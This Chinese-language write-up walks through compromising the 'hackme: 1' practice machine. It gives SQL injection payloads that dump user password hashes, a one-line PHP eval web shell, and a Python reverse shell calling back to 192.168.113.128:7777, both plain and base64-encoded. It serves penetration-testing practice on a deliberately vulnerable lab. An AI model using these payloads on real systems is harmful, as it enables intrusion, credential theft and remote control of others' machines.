hackme: 1
![](https://img-blog.csdnimg.cn/img_convert/4984130bf2ac455cb96f77ce932f5875.png)
0x01
![](https://img-blog.csdnimg.cn/img_convert/12b0d5d745b84d4c9f45cd637182f106.png)
开启80端口,按照描述,在web页面寻找可用信息
0x02
发现是一个登录页面,还可以注册账户,这里盲测一波SQL注入,没有发现,选择了注册一个账户进入里面看看是什么情况
![](https://img-blog.csdnimg.cn/img_convert/eafbde3e888e4a83a7dd7d0dd32810e7.png)
直接点击search按钮可以显示下面这么多书籍,依据已经存在的书籍进行测试sql注入
![](https://img-blog.csdnimg.cn/img_convert/c459ffaf560c4257815c227ce155e132.png)
发现存在sql注入,基于单引号
这里的sql注入测试过程
1.依据已经存在的数据测试,选择一个数据搜索,正常回显且只回显这一条
2.加双引号,发现没有任何回显
3.加" or "1"="1,还是没有任何回显
4.将双引号,换成单引号' or '1'='1,发现回显的是正常条目
所以存在sql注入,为单引号
0x03
通过得到的sql注入点获取信息
# 测试列数
order by 4 #
# 获取表名
select group_concat(table_name) from information_schema.tables where table_schema=database()
# 获取字段名
select group_concat(column_name) from information_schema.columns where table_name='users'
# 获取数据
union select 1,(select group_concat(concat(name,": "),pasword) from users ),3 #
'+payload+#
![](https://img-blog.csdnimg.cn/img_convert/ea6d33d0f9f14e12b09c5f4dc9f5c8ee.png)
0x04
将获取到的数据去解密
http://www.nitrxgen.net/md5db/ + hash-string
![](https://img-blog.csdnimg.cn/img_convert/6bb9156bfbd947499d3ac91b801fc76b.png)
一个一个在登录解密尝试,最后确定了superadmin:Uncrackable
登录之后发现存在一个上传点,经过几次上传发现可以上传任何文件
0x05
上传一个php小马
<?php eval($_POST[1]);?>
![](https://img-blog.csdnimg.cn/img_convert/86bce49bd2114172ad20f14f05db7192.png)
然后用蚁剑连接,查找信息
![](https://img-blog.csdnimg.cn/img_convert/3f075df1783f4bad926ebc5130158026.png)
在这个目录发现了一个二进制文件
0x06
反弹shell,并去查看该二进制文件作用
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.113.128',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
# hackbar执行:1=system(base64_decode("cHl0aG9uIC1jICJpbXBvcnQgb3Msc29ja2V0LHN1YnByb2Nlc3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgnMTkyLjE2OC4xMTMuMTI4Jyw3Nzc3KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWycvYmluL2Jhc2gnLCctaSddKTsi"));
#kali执行 nc -lvp 7777
![](https://img-blog.csdnimg.cn/img_convert/e69216d074244c79a06de080033bf460.png)
![](https://img-blog.csdnimg.cn/img_convert/0cfda4627af544f3badca806bd204eb2.png)
去home目录下查看刚刚哪个二进制文件的信息
END
![](https://img-blog.csdnimg.cn/img_convert/433a40333dfe4879838ef17aa9b3a455.png)